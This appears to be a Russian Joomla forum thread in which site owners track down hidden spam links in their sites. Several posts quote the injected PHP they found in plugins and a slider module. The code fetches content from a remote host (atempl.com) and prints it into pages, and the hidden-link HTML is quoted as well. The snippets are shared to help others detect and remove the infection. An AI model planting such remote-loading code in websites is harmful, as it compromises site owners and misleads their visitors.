Форум русской поддержки Joomla!® CMS
08.12.2016, 18:28:27 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1] 2  Все   Вниз
  Добавить закладку  |  Печать  
Автор

Реклама в шаблоне

 (Прочитано 1530 раз)
0 Пользователей и 1 Гость смотрят эту тему.
sibdes
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 77


Никогда не бойся делать то, что ты не умеешь.


« : 19.02.2016, 09:58:06 »

Не могу найти и убрать рекламу из кода сайта. Что примечательно, на сайте ее не видно. но в коде есть, что не есть хорошо. Сайт кулиш16.рф.
Реклама в позиции модуля headermodule1.
Код:
<div style="position: absolute; top: -1000px;">
<a href="http://fortstroi.com.ua/stroitelstvo/video/video/otdelka-potolka-v-vannoj-komnate-pvkh-panelyami">Отделка потолка в ванной</a><br>
<a href="http://kamael.com.ua/1/sovety-avtomobilistam/327-inzhektor-ili-karbyurator-chto-luchshe">Что лучше инжектор или карбюратор?</a>
</div>

сперва грешил на плагин Fancy Scroll Top, так как у него та же позиция, но поковыряв его ничего подозрительного не нашел.
Записан
sibdes
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 77


Никогда не бойся делать то, что ты не умеешь.


« Ответ #1 : 19.02.2016, 10:03:04 »

поиск через beget ничего не дал. что странно. сам шаблон тоже проверил. в частности index.php, head_includes.php
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Online Online

Пол: Мужской
Сообщений: 2287



« Ответ #2 : 19.02.2016, 10:03:57 »

Обычно это прописано в шаблоне или фреймворке. Не удаляйте, это стандартная плата за использование вареза. Если жить мешает - качайте Joomla с официального сайта joomla.org, то же касается шаблона и расширений. У вас там помимо этих ссылок еще много чего найти можно, если поискать...

Как удалить? Берите программу TotalCommander, Notepad++ и др. и делайте поиск по файлам. Если не найдете прямым текстом, ищите конструкции base64, особенно eval(base64()). Так же код может быть и в яваскриптах и...да где угодно. А может и через шелл заливают ссылочки...
Записан
sibdes
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 77


Никогда не бойся делать то, что ты не умеешь.


« Ответ #3 : 19.02.2016, 10:11:43 »

Цитировать
Обычно это прописано в шаблоне или фреймворке. Не удаляйте, это стандартная плата за использование вареза. Если жить мешает - качайте Joomla с официального сайта Joomla.org, то же касается шаблона и расширений. У вас там помимо этих ссылок еще много чего найти можно, если поискать...

Как удалить? Берите программу TotalCommander, Notepad++ и др. и делайте поиск по файлам. Если не найдете прямым текстом, ищите конструкции base64, особенно eval(base64()). Так же код может быть и в яваскриптах и...да где угодно. А может и через шелл заливают ссылочки...
Пока не мешает. Нигде не торчит. Поживет пока, но как руки дойдут удалю однако. Спасибо. Сдается мне что это шелл, но может и по id идет подстановка ссылок (может поэтому поиск по словам ничего не дал?).
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3488


skype aqaus.com


« Ответ #4 : 19.02.2016, 10:19:02 »

При смене шаблона пропадает?
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Online Online

Пол: Мужской
Сообщений: 2287



« Ответ #5 : 19.02.2016, 10:21:09 »

может и по id идет подстановка ссылок (может поэтому поиск по словам ничего не дал?).
Это как? ))

Записан
voland
Профи
********

Репутация: +488/-86
Offline Offline

Пол: Мужской
Сообщений: 8722


любит наш народ всякое гавно...


« Ответ #6 : 19.02.2016, 10:24:32 »

Сдается мне что это шелл
Пока не мешает.
Поживет пока
Такие дела
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Online Online

Пол: Мужской
Сообщений: 2287



« Ответ #7 : 19.02.2016, 10:29:30 »

как руки дойдут удалю однако...
Такие дела...
Записан
sibdes
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 77


Никогда не бойся делать то, что ты не умеешь.


« Ответ #8 : 20.02.2016, 06:28:30 »

Цитировать
Это как? ))
как пример приведу слайдер: на сайте в исходном коде у него CSS такой:
Код:
#djslider167 {
margin: 0 auto;
position: relative;
height: 80px;
width: 1255px;
max-width: 1255px;
}

в самих файлах слайдера код такой:
Код:
#djslider'.$mid.' {
margin: 0 auto;
position: relative;
height: '.$slider_height.'px;
width: '.$slider_width.'px;
max-width: '.$slider_width.'px;

id значения заменяются реальными . то есть искать в файлах на сервере слово djslider167 бесполезно. но этому объяснение есть. значения в настройках и ставятся. а ссылки... фиг знает где сидят. можно ли как то посмотреть код позиции модуля в файле каком?

Цитировать
При смене шаблона пропадает?
на стандартных в коде чисто. allrounder значит виноват.
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3488


skype aqaus.com


« Ответ #9 : 20.02.2016, 10:01:47 »

Ну вот ) В шаблоне найти дело 5 минут.
Записан
KKAAZZOO
Практически профи
*******

Репутация: +102/-9
Offline Offline

Сообщений: 2087


« Ответ #10 : 20.02.2016, 10:36:58 »

Умудриться скачать изначально бесплатный шаблон с варезника это надо суметь
« Последнее редактирование: 20.02.2016, 20:21:27 от KKAAZZOO » Записан
AlekVolsk
Профи
********

Репутация: +317/-3
Offline Offline

Пол: Мужской
Сообщений: 6460



« Ответ #11 : 20.02.2016, 12:31:37 »

это перл  Grin
Записан
sibdes
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 77


Никогда не бойся делать то, что ты не умеешь.


« Ответ #12 : 20.02.2016, 19:56:39 »

Цитировать
Ну вот ) В шаблоне найти дело 5 минут.
на серваке есть поиск по словам в файле, по нему не получилось найти( как еще можно?
Записан
dmitry_stas
Профи
********

Репутация: +798/-4
Offline Offline

Сообщений: 7774



« Ответ #13 : 20.02.2016, 20:18:57 »

может шаблон все таки скачать с официального сайта? тем более что он, как я понял, бесплатный.
Записан
KKAAZZOO
Практически профи
*******

Репутация: +102/-9
Offline Offline

Сообщений: 2087


« Ответ #14 : 20.02.2016, 20:19:31 »

Вот чистый шаблон http://www.joomla24.com/remository/Download/Templates_for_Joomla_3.x/1%29_General_Joomla_3.x_Templates/Allrounder_J3.html
Записан
BoreS
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 3


« Ответ #15 : 20.02.2016, 20:21:44 »

Та же ситуация. При чёмъ тема купленная несколько летъ назадъ у создателей. Кодъ появился недавно, какъ я понялъ, раньше такого не было. Вареза не ставилъ въ последнее время. Решилъ проблему отключениемъ исходящего трафика съ сайта въ панели хостера, что наводитъ на мысль, что это можетъ быть шеллъ. Проблема решена какъ бы, но это костыль, а не лечение. Изъ блокировки трафика пересталъ работать Social Backlinks, что понятно. Поискъ по словамъ и base64 ничего не далъ. Помогите советомъ.
сайт megaten.ru
Сейчасъ на нёмъ нетъ этихъ ссылокъ, но если включить исходящий трафикъ, они снова появляются Sad
Записан
KKAAZZOO
Практически профи
*******

Репутация: +102/-9
Offline Offline

Сообщений: 2087


« Ответ #16 : 20.02.2016, 20:25:55 »

Несколько лет назад это до революции, судя по вашему слогу, сударь? Создайте новую тему для своего вопроса и не забывайте что здесь нужно писать на современном русском языке
Записан
BoreS
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 3


« Ответ #17 : 20.02.2016, 20:39:44 »

Зачем создавать новую тему, если вопрос тот же самый? те же самые ссылки, значит тот же самый код. Смысл плодить новые темы?
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Online Online

Пол: Мужской
Сообщений: 2287



« Ответ #18 : 21.02.2016, 17:35:53 »

Зачем создавать новую тему, если вопрос тот же самый? те же самые ссылки, значит тот же самый код. Смысл плодить новые темы?

Затем, что выше вы написали:

Вареза не ставилъ въ последнее время

Посему вывод - ваш сайт заражен, как и сайт ТС. Только ТС пытается бороться со ссылками, которые у него вылезают, а у вас уже явные признаки проникновения. Так что этот вопрос решайте индивидуально, лучше всего в коммерческом разделе.
Записан
sibdes
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 77


Никогда не бойся делать то, что ты не умеешь.


« Ответ #19 : 22.02.2016, 09:18:08 »

Цитировать
может шаблон все таки скачать с официального сайта? тем более что он, как я понял, бесплатный.

менять шаблон не вариант, т.к. много изменений было внесено в текущий шаблон. CSS конечно можно перенести, но и только. сейчас уже думаю что дело в каком нибудь компоненте или плагине. но опять же почему поиск по ключ. словам ничего не дает? на хостинге от бегета есть довольно таки полезная функция как поиск в файле определенного слова. раньше всегда находил.
Записан
Taatshi
Support Team
*****

Репутация: +430/-3
Offline Offline

Пол: Женский
Сообщений: 4718

Мама, я снова верстал во сне...


« Ответ #20 : 22.02.2016, 10:12:15 »

Потому что может подгружаться скриптами - фиг Вы тогда в шаблоне что-то найдете - хоть в base, хоть в eval
Записан
dmitry_stas
Профи
********

Репутация: +798/-4
Offline Offline

Сообщений: 7774



« Ответ #21 : 22.02.2016, 11:36:16 »

менять шаблон не вариант
та хотя бы на время, чтобы понять ссылки будут или нет. они же сразу видны будут? вот и переключить на заведомо чистый шаблон, и посмотреть.
Записан
sibdes
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 77


Никогда не бойся делать то, что ты не умеешь.


« Ответ #22 : 22.02.2016, 13:27:36 »

Цитировать
та хотя бы на время, чтобы понять ссылки будут или нет. они же сразу видны будут? вот и переключить на заведомо чистый шаблон, и посмотреть.
а если проблема в компоненте каком или плагине? они ведь независимо от шаблона подгружаются? попробую может и правда шаблон кривой.
Записан
dmitry_stas
Профи
********

Репутация: +798/-4
Offline Offline

Сообщений: 7774



« Ответ #23 : 22.02.2016, 13:34:35 »

Цитировать
а если проблема в компоненте каком или плагине?
та все может быть, я ж не против. но для начала хотя бы исключить версию с шаблоном, тем более происхождение шаблона непонятно.
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Online Online

Пол: Мужской
Сообщений: 2287



« Ответ #24 : 22.02.2016, 14:08:33 »

Похоже, ТС проще выстрелить себе в ногу...  Grin
Записан
sibdes
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 77


Никогда не бойся делать то, что ты не умеешь.


« Ответ #25 : 25.02.2016, 05:32:23 »

шаблон сменил. ссылки остались.(
Записан
BoreS
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 3


« Ответ #26 : 27.02.2016, 01:35:38 »

В общем, нашёл я эту гадость. И была эта штука в плагине extranews для Joomla 2.5. Видать где-то я скачал у недобросовестного человека. И этот человек вставил вот такой код в файлик plugins/content/plg_extranews/plg_extranews.php Ниже привожу этот код. может кому пригодится для поиска этой дряни у себя на сайте.
Код:
$files = 'http://atempl.com/10.txt'; 
$file_headers = @get_headers($files); 
if($file_headers[0] == 'HTTP/1.1 200 OK')
 { 
       $content = file("http://atempl.com/10.txt");
       $data = implode($content);
       echo $data;
 } 
Записан
dmitry_stas
Профи
********

Репутация: +798/-4
Offline Offline

Сообщений: 7774



« Ответ #27 : 27.02.2016, 10:48:30 »

хорошо что только такое вставили, а не чего то пострашнее...
Записан
sibdes
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 77


Никогда не бойся делать то, что ты не умеешь.


« Ответ #28 : 28.02.2016, 10:50:50 »

Урря! Зараза найдена.
вот код
Код:
<?php
$files = 'http://atempl.com/5.txt';  
$file_headers = @get_headers($files);  
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {  
$url = "http://atempl.com/5.txt";
$content = @file_get_contents($url);
$data = implode($content);
 echo $data; }  
?>

вот место: /plugins/content/jclock/jclock.php
Благодарю всех кто помогал. Отдельно выражаю благодарность BoreS.
Записан
sibdes
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 77


Никогда не бойся делать то, что ты не умеешь.


« Ответ #29 : 28.02.2016, 10:55:03 »

Зараза найдена даже в двух местах:
Код:
<?php
$files = 'http://atempl.com/10.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://atempl.com/10.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;
 }
?>
по адресу /modules/mod_djimageslider/tmpl/default.php
Записан
Страниц: [1] 2  Все   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet